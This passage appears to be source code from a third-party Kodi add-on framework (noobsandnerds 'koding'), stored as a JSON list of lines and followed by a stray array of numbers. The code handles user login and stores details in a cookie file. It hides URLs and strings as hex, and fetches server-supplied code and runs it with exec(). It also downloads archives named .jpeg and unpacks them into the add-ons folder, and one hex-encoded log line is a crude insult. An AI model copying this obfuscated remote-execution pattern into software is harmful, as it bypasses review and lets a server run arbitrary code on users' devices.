os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'))\n", " if not os.path.exists(cookie_folder):\n", " os.makedirs(cookie_folder)\n", " writefile = open(COOKIE,'w')\n", " writefile.close()\n", "\n", " readfile = open(COOKIE,'r')\n", " content = Encryption('d',readfile.read())\n", " readfile.close()\n", "\n", " loginmatch = re.compile('w=\"(.+?)\"').findall(content)\n", " basematch = re.compile('b=\"(.+?)\"').findall(content)\n", " datematch = re.compile('d=\"(.+?)\"').findall(content)\n", " addonsmatch = re.compile('a=\"(.+?)\"').findall(content)\n", " basedomain = basematch[0] if (len(basematch) > 0) else 'http://noobsandnerds.com'\n", " date = datematch[0] if (len(datematch) > 0) else '0'\n", " welcometext = loginmatch[0] if (len(loginmatch) > 0) else ''\n", " addons = addonsmatch[0] if (len(addonsmatch) > 0) else ''\n", "\n", " returns = ['register','PASSWORD','restricted','reactivate']\n", " LOGIN = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6c6f67696e'))\n", " USERNAME = Addon_Setting(addon_id=ORIG_ID,setting=converthex('757365726e616d65')) if LOGIN == 'true' else ''\n", " PASSWORD = Addon_Setting(addon_id=ORIG_ID,setting=converthex('70617373776f7264')) if LOGIN == 'true' else ''\n", "\n", " if welcometext not in returns and welcometext != USERNAME:\n", " run_cookie = True\n", " elif LOGIN == 'true' and welcometext == '':\n", " User_Info()\n", " return\n", " elif LOGIN == 'true' and welcometext != USERNAME:\n", " run_cookie = True\n", " elif LOGIN == 'false' and welcometext == USERNAME:\n", " run_cookie = True\n", " else:\n", " run_cookie = False\n", "\n", " if run_cookie:\n", " try:\n", " shutil.rmtree(COOKIE)\n", " except:\n", " pass\n", "\n", " if mode == 'base':\n", " if int(date)+1000000 < int(Timestamp()):\n", " User_Info('cookie_check')\n", " else:\n", " return basedomain\n", "\n", " else:\n", " if int(date)+1000000 < int(Timestamp()) or run_cookie:\n", " return False\n", " else:\n", " return True\n", "#----------------------------------------------------------------\n", "def Check_File_Date(url, datefile, localdate, dst):\n", " \"\"\" internal command ~\"\"\"\n", " try:\n", " req = urllib2.Request(url)\n", " req.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3')\n", " conn = urllib2.urlopen(req)\n", " last_modified = conn.info().getdate('last-modified')\n", " last_modified = time.strftime('%Y%m%d%H%M%S', last_modified)\n", "\n", " if int(last_modified) > int(localdate):\n", " dp.create(THIS_MODULE.getLocalizedString(30979),THIS_MODULE.getLocalizedString(30807))\n", " download.download(url,dst,dp)\n", " if converthex('74737463686b') in url:\n", " extract.all(dst,ADDONS,dp)\n", " else:\n", " extract.all(dst, ADDON_DATA, dp)\n", " writefile = open(datefile, 'w+')\n", " writefile.write(last_modified)\n", " writefile.close()\n", " try:\n", " if os.path.exists(dst):\n", " os.remove(dst)\n", " except:\n", " pass\n", " except:\n", " pass\n", "#----------------------------------------------------------------\n", "def Check_Updates(url, datefile, dst):\n", " \"\"\" internal command ~\"\"\"\n", " if os.path.exists(datefile):\n", " readfile = open(datefile,'r')\n", " localdate = readfile.read()\n", " readfile.close()\n", " else:\n", " localdate = 0\n", " Check_File_Date(url, datefile, int(localdate), dst)\n", "#---------------------------------------------------------------- \n", "def Encryption(mode='', message=''):\n", " \"\"\" internal command ~\"\"\"\n", " finaltext = ''\n", " translated = ''\n", " finalstring = ''\n", " offset = 8\n", " if len(USERNAME) > 0 and LOGIN == 'true':\n", " offset = usernamelen\n", " if mode == 'e':\n", " for symbol in message:\n", " num = ord(symbol)+offset\n", " if len(str(num))==2:\n", " num = '0'+str(num)\n", " finalstring = str(finalstring)+str(num)\n", " return finalstring+finaltext\n", "\n", " else:\n", " messagearray = [message[i:i+3] for i in range(0, len(message), 3)]\n", " for item in messagearray:\n", " item = int(item)-offset\n", " item = str(unichr(item))\n", " finaltext = finaltext+item\n", " return finaltext\n", "#----------------------------------------------------------------\n", "def Get_IP():\n", " \"\"\" internal command ~\"\"\"\n", " link = Open_URL(converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f6c6f67696e5f636f6f6b69652e706870'), 'post').replace('\\r','').replace('\\n','').replace('\\t','')\n", " link = Encryption(mode='d',message=link)\n", " ipmatch = re.compile('i=\"(.+?)\"').findall(link)\n", " ipfinal = ipmatch[0] if (len(ipmatch) > 0) else ''\n", " return ipfinal\n", "#----------------------------------------------------------------\n", "# TUTORIAL #\n", "def Main(url='', post_type = 'get'):\n", " \"\"\"\n", "If you have web pages of your own then you can hook into them using\n", "koding.Main(url) which will pull the return from the URL and attempt\n", "to execute that code.\n", "\n", "WARNING: Running code directly from a server is generally discouraged,\n", "any add-ons using such code will certainly not be accepted on the official\n", "kodi.tv forum as it is strictly against their rules. By having add-ons\n", "capable of self updating and bypassing their highly vetted repository\n", "system it would be a security breach for the foundation so their stance on\n", "this is completely understandable. For third party development you are\n", "presumably in control of your own repository so it really shouldn't make\n", "much difference, however do note that running code directly from a server\n", "is slower than running locally and you'll find it's discouraged by a number\n", "of devs. Can certainly be useful for quick dynamic updates which need to\n", "take place though.\n", "\n", "CODE: koding.Main(url,[post_type])\n", "post_type is optional, by default it's set as 'get'\n", "\n", "AVAILABLE VALUES:\n", "\n", " 'get' - This is already the default so no real need to add this but this uses a standard query string\n", " \n", " 'post' - This will convert the query string into a post\n", "\n", "EXAMPLE CODE:\n", "koding.Main('http://noobsandnerds.com?id=test', post_type='get')~\"\"\"\n", " try:\n", " url = converthex(url)\n", " except:\n", " pass\n", "\n", " if url == 'run':\n", " runcode_date = 0\n", " if os.path.exists(RUNCODE):\n", " runcode_date = os.path.getmtime(RUNCODE)\n", " runcode_date = time.localtime(runcode_date)\n", " runcode_date = time.strftime('%Y%m%d%H%M%S', runcode_date)\n", " if int(runcode_date)+1000000 < int(Timestamp()):\n", " run_code = Open_URL(url, post_type)\n", " if run_code:\n", " writefile = open(RUNCODE, 'w')\n", " writefile.write(run_code)\n", " writefile.close()\n", " else:\n", " readfile = open(RUNCODE,'r')\n", " run_code = readfile.read()\n", " readfile.close()\n", "\n", " else:\n", " run_code = Open_URL(url=url, post_type=post_type)\n", "\n", " if run_code:\n", " try:\n", " my_code = Encryption('d',run_code)\n", " dolog('MY CODE: %s'%my_code)\n", " exec(my_code)\n", " dolog(converthex('232323205375636365737366756c6c792072756e20636f646520696e20656e6372797074696f6e206d6f6465'))\n", " except:\n", " dolog(converthex('232323204661696c656420746f2072756e20636f64652c20617474656d7074696e6720746f20757365207374616e64617264206d6f6465'))\n", " try:\n", " exec(run_code)\n", " dolog(converthex('232323205375636365737366756c6c792072756e20636f6465'))\n", " except:\n", " dolog(Last_Error())\n", " try:\n", " exec(converthex(run_code))\n", " dolog(converthex('232323205375636365737366756c6c792072756e20636f6465'))\n", " except:\n", " if DEBUG == 'true':\n", " dialog.ok(THIS_MODULE.getLocalizedString(30980),THIS_MODULE.getLocalizedString(30981)%ADDON_ID)\n", " else:\n", " dolog(run_code)\n", "#-----------------------------------------------------------------------------\n", "# TUTORIAL #\n", "def User_Info(mode = ''):\n", " \"\"\"\n", "THIS MUST BE CALLED AT START OF CODE IF USING NOOBSANDNERDS FRAMEWORK.\n", "\n", "This is only required for developers who want to use the special\n", "noobsandnerds features, this will create a cookie file containing cached\n", "details. It's important you do this somewhere at the start of your code as\n", "it will initialise your variables on first run.~\"\"\"\n", " global main_counter\n", "\n", " if not Check_Cookie():\n", " LOGIN = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6c6f67696e'))\n", " USERNAME = Addon_Setting(addon_id=ORIG_ID,setting=converthex('757365726e616d65')).replace(' ','%20') if LOGIN == 'true' else ''\n", " PASSWORD = Addon_Setting(addon_id=ORIG_ID,setting=converthex('70617373776f7264')) if LOGIN == 'true' else ''\n", " link = Open_URL('', 'post').replace('\\r','').replace('\\n','').replace('\\t','')\n", " if len(link) < 3:\n", " dialog.ok(THIS_MODULE.getLocalizedString(30833),THIS_MODULE.getLocalizedString(30834))\n", " return\n", " try:\n", " link = Encryption('d',link)\n", " except:\n", " try:\n", " link = converthex(link)\n", " except:\n", " dolog(converthex('556e61626c6520746f2072657472696576652076616c696420646174612066726f6d20736572766572'))\n", " welcomematch = re.compile('l=\"(.+?)\"').findall(link)\n", " welcometext = welcomematch[0] if (len(welcomematch) > 0) else ''\n", " ipmatch = re.compile('i=\"(.+?)\"').findall(link)\n", " ipclean = ipmatch[0] if (len(ipmatch) > 0) else '0.0.0.0'\n", " domainmatch = re.compile('d=\"(.+?)\"').findall(link)\n", " domain = domainmatch[0] if (len(domainmatch) > 0) else ''\n", " emailmatch = re.compile('e=\"(.+?)\"').findall(link)\n", " email = emailmatch[0] if (len(emailmatch) > 0) else 'Unknown'\n", " postsmatch = re.compile('p=\"(.+?)\"').findall(link)\n", " posts = postsmatch[0] if (len(postsmatch) > 0) else '0'\n", " unreadmatch = re.compile('u=\"(.+?)\"').findall(link)\n", " unread = unreadmatch[0] if (len(unreadmatch) > 0) else '0'\n", " messagematch = re.compile('m=\"(.+?)\"').findall(link)\n", " messages = messagematch[0] if (len(messagematch) > 0) else '0'\n", " donmatch = re.compile('t=\"(.+?)\"').findall(link)\n", " don = donmatch[0] if (len(donmatch) > 0) else ''\n", " stdmatch = re.compile('s=\"(.+?)\"').findall(link)\n", " std = stdmatch[0] if (len(stdmatch) > 0) else ''\n", " nologinmatch = re.compile('n=\"(.+?)\"').findall(link)\n", " nologin = nologinmatch[0] if (len(nologinmatch) > 0) else ''\n", " reqaddonmatch = re.compile('r=\"(.+?)\"').findall(link)\n", " reqaddons = reqaddonmatch[0] if (len(reqaddonmatch) > 0) else ''\n", "\n", " dolog(converthex('7265717569726564206164646f6e733a'))\n", "\n", "# User required re-activation on the FORUM - old FORUM user from totalxbmc\n", " if converthex('72656163746976617465') in welcometext:\n", " xbmc.log(converthex('75736572696e666f202d2072656163746976617465'))\n", " try:\n", " dolog(converthex('726561637469766174696f6e207265717569726564202d20706c656173652076697369742074686520666f72756d206174207777772e6e6f6f6273616e646e657264732e636f6d2f737570706f727420616e64206c6f67696e2e204974206c6f6f6b732061732074686f75676820796f75206861766520616e206f6c64206163636f756e742066726f6d20546f74616c58424d432064617973207768696368206a75737420726571756972656420726561637469766174696f6e2e'))\n", " os.remove(COOKIE)\n", " except:\n", " pass\n", " dialog.ok(THIS_MODULE.getLocalizedString(30831),THIS_MODULE.getLocalizedString(30832))\n", "\n", "# Currently restricted\n", " elif converthex('72657374726963746564') in welcometext:\n", " xbmc.log(converthex('75736572696e666f202d2072657374726963746564'))\n", " dolog(converthex('5741524e494e473a204163636f756e742063757272656e746c792072657374726963746564202d20746f6f206d616e79206c6f67696e732066726f6d206d756c7469706c65204950732e20496620796f75207468696e6b20796f75277665206163636964656e74616c6c79206c656674206c6f67696e20696e666f726d6174696f6e20696e2061206275696c64206f7220796f7572206c6f67696e20686173206265656e20636f6d70726f6d6973656420706c656173652075706461746520796f75722070617373776f7264206f6e20746865206e6f6f6273616e646e6572647320666f72756d20415341502121212054686973207265737472696374696f6e2077696c6c206265206175746f6d61746963616c6c79206c69667465642077697468696e20323420686f757273206275742077696c6c206265207265696e73746174656420617320736f6f6e206173206d756c7469706c6520495020636f6e6e656374696f6e73206172652064657465637465642e'))\n", " dialog.ok(THIS_MODULE.getLocalizedString(30829),THIS_MODULE.getLocalizedString(30830))\n", "\n", "# Wrong PASSWORD entered\n", " elif converthex('70617373776f7264') in welcometext:\n", " xbmc.log(converthex('75736572696e666f202d2077726f6e672070617373776f7264'))\n", " try:\n", " dolog(converthex('77726f6e672070617373776f7264202d20706c656173652072652d656e74657220616e642074727920616761696e'))\n", " os.remove(COOKIE)\n", " except:\n", " pass\n", " dialog.ok(THIS_MODULE.getLocalizedString(30825),THIS_MODULE.getLocalizedString(30826))\n", " Open_Settings()\n", "\n", "# Not registered and LOGIN is true\n", " elif converthex('7265676973746572') in welcometext and LOGIN == 'true':\n", " xbmc.log(converthex('75736572696e666f202d206e6f742072656769737465726564'))\n", " try:\n", " dolog(converthex('4e6f742072656769737465726564202d20706c65617365207265676973746572206174207777772e6e6f6f6273616e646e657264732e636f6d2f737570706f7274'))\n", " os.remove(COOKIE)\n", " except:\n", " pass\n", " dialog.ok(THIS_MODULE.getLocalizedString(30827),THIS_MODULE.getLocalizedString(30828))\n", " Open_Settings()\n", "\n", "# Login is true but not details are entered\n", " elif LOGIN == 'true' and USERNAME == '' and PASSWORD == '':\n", " xbmc.log(converthex('75736572696e666f202d206c6f67696e207472756520627574206e6f2064657461696c73'))\n", " dialog.ok(THIS_MODULE.getLocalizedString(30835),THIS_MODULE.getLocalizedString(30836))\n", " Open_Settings()\n", "\n", "# All settings checks are fine, create the COOKIE file\n", " else:\n", " xbmc.log(converthex('75736572696e666f202d20616c6c2066696e65'))\n", " dolog(converthex('416c6c2073657474696e677320636865636b206f75742066696e65202d207570646174696e6720636f6f6b69652066696c65'))\n", " writefile = open(COOKIE, mode='w+')\n", " writefile.write(Encryption('e','d=\"'+str(Timestamp())+'\"|b=\"'+domain+'\"|w=\"'+welcometext+'\"|i=\"'+ipclean+'\"|e=\"'+email+'\"|m=\"'+messages+'\"|u=\"'+unread+'\"|t=\"'+don+'\"|s=\"'+std+'\"|p=\"'+posts+'\"'+'\"|n=\"'+nologin+'\"'+'\"|a=\"'+reqaddons+'\"'))\n", " writefile.close()\n", " main_counter += 1\n", " Check_Addons(reqaddons)\n", "\n", " if main_counter < 3:\n", " xbmc.log(converthex('23232320646f696e6720766572696679'))\n", " Verify()\n", " else:\n", " dialog.ok(THIS_MODULE.getLocalizedString(30833),THIS_MODULE.getLocalizedString(30834))\n", " return\n", "\n", "# If this was called to recreate a COOKIE file just to return base url then we call that function again\n", " elif mode == 'cookie_check':\n", " Check_Cookie('base')\n", "\n", " else:\n", " Verify()\n", "#----------------------------------------------------------------\n", "def Verify(testmode = ''):\n", " \"\"\" internal command ~\"\"\"\n", " ADDON_ID = xbmcaddon.Addon().getAddonInfo('id') \n", " try:\n", " if sys.argv[1] == converthex('7465737466696c65'):\n", " ADDON_ID = ADDON_ID+'.test'\n", " except:\n", " pass\n", "# if LOGIN is true but no USERNAME and PASSWORD we open settings\n", " localfile = open(COOKIE, mode='r')\n", " content = localfile.read()\n", " content = Encryption('d',content)\n", " localfile.close()\n", " nologinmatch = re.compile('n=\"(.+?)\"').findall(content)\n", "\n", "# Set the standard logged in downloads array\n", " if len(nologinmatch)>0:\n", " nologindownloads = nologinmatch[0].split(',')\n", "\n", " for item in nologindownloads:\n", " if len(item)>3:\n", " download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ORIG_ID+'/'+item+'.jpeg')\n", " Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+ORIG_ID+'/'+item), DOWNLOAD_DST)\n", "\n", "# If LOGIN is true but they haven't entered details then open up settings\n", " if LOGIN == 'true' and (USERNAME == '' or PASSWORD == ''):\n", " dolog(converthex('6c6f67696e207472756520627574207573657220616e64207061737320626c616e6b'))\n", " dialog.ok(THIS_MODULE.getLocalizedString(30835),THIS_MODULE.getLocalizedString(30836))\n", " ADDON.openSettings()\n", " return\n", "\n", "# if test version enabled but LOGIN isn't tell user they need to enter credentials\n", " elif USE_TEST == 'true' and LOGIN == 'false':\n", " dolog(converthex('747279696e6720746f2072756e20746573742076657273696f6e20627574206e6f206c6f67696e20696e666f'))\n", " dialog.ok(THIS_MODULE.getLocalizedString(30961),THIS_MODULE.getLocalizedString(30962))\n", " ADDON.openSettings()\n", " return\n", "\n", "# else if LOGIN is true continue\n", " elif LOGIN == 'true':\n", " dolog(converthex('6c6f67696e20697320656e61626c6564'))\n", "\n", "# if user not previously logged in call the user_info function\n", " if not os.path.exists(COOKIE):\n", " dolog(converthex('6c6f6767696e6720696e20666f722066697273742074696d65202d20636865636b696e672063726564656e7469616c73'))\n", " User_Info()\n", "\n", "# if user previously logged in then read COOKIE file\n", " else:\n", " dolog(converthex('70726576696f75736c79206c6f6767656420696e2c20636865636b696e6720636f6f6b6965'))\n", "\n", " userdatematch = re.compile('d=\"(.+?)\"').findall(content)\n", " loginmatch = re.compile('w=\"(.+?)\"').findall(content)\n", " ipmatch = re.compile('i=\"(.+?)\"').findall(content)\n", " donmatch = re.compile('t=\"(.+?)\"').findall(content)\n", " stdmatch = re.compile('s=\"(.+?)\"').findall(content)\n", " basematch = re.compile('b=\"(.+?)\"').findall(content)\n", " addonsmatch = re.compile('a=\"(.+?)\"').findall(content)\n", " basedomain = basematch[0] if (len(basematch) > 0) else ''\n", " updatecheck = userdatematch[0] if (len(userdatematch) > 0) else '0'\n", " welcometext = loginmatch[0] if (len(loginmatch) > 0) else ''\n", " addons = addonsmatch[0] if (len(addonsmatch) > 0) else ''\n", " ipclean = ipmatch[0] if (len(ipmatch) > 0) else '0.0.0.0'\n", " myip = Get_IP()\n", "\n", "# Set the standard logged in downloads array\n", " if len(stdmatch)>0:\n", " stddownloads = stdmatch[0].split(',')\n", "\n", "# if user has chosen to use test version check test version is avaialble and if not already installed install it then open the settings for new addon\n", " if USE_TEST == 'true':\n", " global launch\n", " testmatch = donmatch[0].split('|')\n", " launch = testmatch[0]\n", " downloads = testmatch[1].split(',')\n", "\n", " if not ADDON_ID.endswith(converthex('2e74657374')):\n", " TestADDON_ID = ADDON_ID+converthex('2e74657374')\n", " else:\n", " TestADDON_ID = ADDON_ID\n", " ADDON_ID = ADDON_ID.replace(converthex('2e74657374'),'')\n", "\n", " if len(downloads)>0 and not os.path.exists(os.path.join(ADDONS,TestADDON_ID)):\n", " try:\n", " download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ADDON_ID+'/'+downloads[0]+'.jpeg')\n", " Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+ADDON_ID+'/'+downloads[0]), DOWNLOAD_DST)\n", " xbmc.executebuiltin('UpdateLocalAddons')\n", "\n", "# open settings for new addon, this is so the relevant settings can be opened\n", " xbmc.sleep(2000)\n", " xbmcaddon.Addon(id=TestADDON_ID).openSettings()\n", " return\n", " except:\n", " dialog.ok(THIS_MODULE.getLocalizedString(30965),THIS_MODULE.getLocalizedString(30966))\n", " return\n", " elif len(downloads)==0:\n", " dialog.ok(THIS_MODULE.getLocalizedString(30963),THIS_MODULE.getLocalizedString(30964))\n", " return\n", "\n", " xbmc.executebuiltin(\"XBMC.Notification(\"+THIS_MODULE.getLocalizedString(30807)+\",\"+THIS_MODULE.getLocalizedString(30808)+\",5000,\"+UPDATE_ICON+\")\")\n", "\n", "# if user needs to reactivate account remove COOKIE file and notify user they need to LOGIN at FORUM\n", " if converthex('72656163746976617465') in welcometext:\n", " dolog(converthex('23232320766572696679202d206163636f756e74206e6565647320726561637469766174696f6e'))\n", " try:\n", " os.remove(COOKIE)\n", " except:\n", " pass\n", " dialog.ok(THIS_MODULE.getLocalizedString(30831),THIS_MODULE.getLocalizedString(30832))\n", "\n", "# if user is currently restricted they cannot continue\n", " elif converthex('63757272656e746c792072657374726963746564') in welcometext:\n", " dolog(converthex('23232320766572696679202d206163636f756e742069732072657374726963746564'))\n", " dialog.ok(THIS_MODULE.getLocalizedString(30829),THIS_MODULE.getLocalizedString(30830))\n", "\n", "# if user enters wrong PASSWORD remove COOKIE and get them to re-enter details\n", " elif converthex('57726f6e672050617373776f726420456e7465726564') in welcometext:\n", " dolog(converthex('23232320766572696679202d2077726f6e672070617373776f72642c2072656d6f76696e6720636f6f6b6965'))\n", " try:\n", " os.remove(COOKIE)\n", " except:\n", " pass\n", " dialog.ok(THIS_MODULE.getLocalizedString(30825),THIS_MODULE.getLocalizedString(30826))\n", " ADDON.openSettings()\n", "\n", "# if they aren't registered remove the COOKIE file and open settings\n", " elif converthex('524547495354455220464f522046524545') in welcometext:\n", " dolog('4449584945204445414e204953204120434f434b20474f42424c4552')\n", " try:\n", " os.remove(COOKIE)\n", " except:\n", " pass\n", " dialog.ok(THIS_MODULE.getLocalizedString(30827),THIS_MODULE.getLocalizedString(30828))\n", " ADDON.openSettings()\n", "\n", "# if the date in COOKIE is not up and the ip matches the one in COOKIE we can continue\n", " dolog(Encryption('e', converthex('23232320766572696679202d206970636c65616e3a202573') % ipclean))\n", " dolog(Encryption('e', converthex('23232320766572696679202d206d7969703a202573') % myip))\n", "\n", " elif int(updatecheck)+1000000 > int(Timestamp()) and ipclean == myip:\n", " if USE_TEST == 'true':\n", " dolog(converthex('23232320766572696679202d207465737476657273696f6e2069732074727565'))\n", " for item in downloads:\n", " dolog(Encryption('e',converthex('23232320766572696679202d20636865636b696e673a202573') % item))\n", " download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ADDON_ID+'/'+item+'.jpeg')\n", " cleanitem = item.replace('test','')\n", " if Addon_Setting(addon_id=TestID,setting=cleanitem) == 'true':\n", " Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+TestID+'/'+item), DOWNLOAD_DST)\n", " for item in stddownloads:\n", " dolog('4449584945204445414e204953204120434f434b20474f42424c4552')\n", " download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ORIG_ID+'/'+item+'.jpeg')\n", " if Addon_Setting(addon_id=ADDON,setting=item) == 'true':\n", " Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+ORIG_ID+'/'+item), DOWNLOAD_DST)\n", " xbmc.executebuiltin('Dialog.Close(busydialog)')\n", " Main('run')\n", " \n", " else:\n", " User_Info()\n", " elif LOGIN == 'false':\n", " dolog('232323206c6f67696e2064697361626c6564')\n", " Main('run')\n", "#----------------------------------------------------------------\n", "try:\n", " if sys.argv[1] == converthex('7465737466696c65') and LOGIN == 'true':\n", " if os.path.exists(os.path.join(ADDONS,ORIG_ID)) and os.path.exists(os.path.join(ADDONS,TestID)):\n", " dolog(converthex('2323232072756e6e696e67207665726966792822747275652229'))\n", " Verify('true')\n", " if sys.argv[1] == converthex('73657474696e6773'):\n", " if not os.path.exists(os.path.join(ADDONS,TestID)):\n", " dialog.ok(THIS_MODULE.getLocalizedString(30901),THIS_MODULE.getLocalizedString(30902))\n", " else:\n", " xbmcaddon.Addon(id=TestID).openSettings()\n", " if sys.argv[1] == converthex('636c6561725f64617461'):\n", " Clear_Data(ADDON_ID)\n", "except:\n", " pass" ]
[ 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0.01020408163265306, 0.010638297872340425, 0.3333333333333333, 0.01020408163265306, 0.010416666666666666, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.125, 0, 0, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0, 0.047619047619047616, 0, 0, 0, 0, 0.2, 0, 0.125, 0, 0, 0, 0, 0, 0, 0.05263157894736842, 0.125, 0, 0, 0, 0.058823529411764705, 0, 0.03571428571428571, 0, 0.06896551724137931, 0, 0.037037037037037035, 0, 0.037037037037037035, 0.04081632653061224, 0.04, 0.044444444444444446, 0.033707865168539325, 0.04081632653061224, 0.030927835051546393, 0.041666666666666664, 0.05042016806722689, 0.05714285714285714, 0.05504587155963303, 0.024793388429752067, 0.047058823529411764, 0.047058823529411764, 0.0364963503649635, 0.03389830508474576, 0.047058823529411764, 0.04040404040404041, 0.039603960396039604, 0.04597701149425287, 0.025974025974025976, 0, 0.05405405405405406, 0.044444444444444446, 0, 0.0625, 0.09090909090909091, 0, 0.08695652173913043, 0.08695652173913043, 0.043478260869565216, 0, 0.058823529411764705, 0, 0, 0, 0, 0, 0, 0, 0, 0.03488372093023256, 0.02531645569620253, 0.015151515151515152, 0, 0.08108108108108109, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0.03773584905660377, 0.015151515151515152, 0.038461538461538464, 0, 0, 0, 0, 0.03496503496503497, 0.015151515151515152, 0.10344827586206896, 0, 0, 0.03488372093023256, 0, 0, 0.02702702702702703, 0, 0, 0.05714285714285714, 0.04, 0, 0, 0.01694915254237288, 0.01694915254237288, 0.01694915254237288, 0, 0.022988505747126436, 0.015625, 0, 0.014925373134328358, 0, 0.046875, 0.0449438202247191, 0.03278688524590164, 0.03278688524590164, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.015151515151515152, 0.019230769230769232, 0, 0, 0, 0.015384615384615385, 0, 0, 0, 0, 0, 0.020202020202020204, 0.047619047619047616, 0, 0.046511627906976744, 0, 0, 0, 0, 0, 0, 0, 0, 0.0625, 0, 0.08333333333333333, 0, 0.015151515151515152, 0.02564102564102564, 0, 0, 0.05128205128205128, 0, 0, 0, 0, 0, 0.02857142857142857, 0.02702702702702703, 0, 0.047619047619047616, 0.047619047619047616, 0, 0.05, 0, 0, 0, 0, 0, 0.030303030303030304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.015151515151515152, 0.07142857142857142, 0, 0.024509803921568627, 0.037037037037037035, 0.017241379310344827, 0.01639344262295082, 0, 0.015151515151515152, 0, 0.08108108108108109, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009259259259259259, 0.2, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0, 0, 0, 0, 0, 0, 0, 0, 0.02127659574468085, 0.024390243902439025, 0, 0.00819672131147541, 0.0625, 0.006944444444444444, 0, 0, 0.011363636363636364, 0.05, 0, 0, 0, 0.010869565217391304, 0.041666666666666664, 0, 0.025, 0, 0, 0.012658227848101266, 0, 0.11538461538461539, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0.03571428571428571, 0.03305785123966942, 0.06315789473684211, 0, 0.020202020202020204, 0, 0, 0.044444444444444446, 0.0625, 0, 0.024390243902439025, 0.05, 0.008333333333333333, 0.016129032258064516, 0.013333333333333334, 0.016129032258064516, 0.013888888888888888, 0.016129032258064516, 0.0136986301369863, 0.016129032258064516, 0.01282051282051282, 0.016129032258064516, 0.013888888888888888, 0.016129032258064516, 0.013513513513513514, 0.016129032258064516, 0.013157894736842105, 0.016129032258064516, 0.014925373134328358, 0.016129032258064516, 0.014925373134328358, 0.016129032258064516, 0.013333333333333334, 0, 0.012987012987012988, 0, 0, 0, 0, 0, 0, 0, 0.0024271844660194173, 0, 0.05, 0, 0.020202020202020204, 0, 0, 0, 0, 0.001282051282051282, 0.020202020202020204, 0, 0, 0, 0.011494252873563218, 0, 0.007692307692307693, 0, 0.05, 0, 0.020202020202020204, 0, 0, 0, 0, 0.011494252873563218, 0, 0.005952380952380952, 0, 0.05, 0, 0.020202020202020204, 0, 0, 0, 0, 0.009174311926605505, 0.020202020202020204, 0, 0, 0, 0, 0, 0.007462686567164179, 0, 0.008032128514056224, 0, 0, 0, 0, 0, 0, 0, 0, 0.019417475728155338, 0, 0, 0.009615384615384616, 0, 0, 0, 0, 0, 0.015151515151515152, 0.1111111111111111, 0, 0.018867924528301886, 0, 0, 0.047619047619047616, 0.08333333333333333, 0, 0, 0.020833333333333332, 0.023809523809523808, 0.04081632653061224, 0, 0.015151515151515152, 0, 0, 0.03571428571428571, 0, 0, 0, 0.03571428571428571, 0.0070921985815602835, 0.005917159763313609, 0, 0, 0, 0.01020408163265306, 0.021052631578947368, 0, 0, 0, 0.012048192771084338, 0, 0.00847457627118644, 0.021052631578947368, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.007692307692307693, 0, 0, 0, 0, 0.009259259259259259, 0, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0.012658227848101266, 0.022727272727272728, 0.024691358024691357, 0.024096385542168676, 0.024390243902439025, 0, 0, 0, 0.03125, 0, 0, 0.006666666666666667, 0, 0, 0.01639344262295082, 0.0196078431372549, 0.016129032258064516, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0.031578947368421054, 0, 0.006329113924050633, 0.005376344086021506, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0.018018018018018018, 0, 0.025, 0.018691588785046728, 0, 0, 0.006289308176100629, 0, 0.009900990099009901, 0, 0.008620689655172414, 0, 0, 0.041666666666666664, 0, 0.019417475728155338, 0, 0, 0.011363636363636364, 0.009433962264150943, 0.019417475728155338, 0, 0, 0.010869565217391304, 0.007936507936507936, 0, 0, 0.041666666666666664, 0, 0.019417475728155338, 0, 0, 0, 0.012195121951219513, 0.012195121951219513, 0, 0, 0.041666666666666664, 0, 0.019417475728155338, 0, 0, 0.011494252873563218, 0.008849557522123894, 0.009615384615384616, 0, 0.012195121951219513, 0, 0.009433962264150943, 0, 0.01680672268907563, 0.006666666666666667, 0.016666666666666666, 0.022988505747126436, 0.005555555555555556, 0, 0.011627906976744186, 0.006896551724137931, 0.012987012987012988, 0.005649717514124294, 0, 0, 0.07692307692307693, 0, 0, 0, 0, 0, 0.015151515151515152, 0.2, 0, 0.02857142857142857, 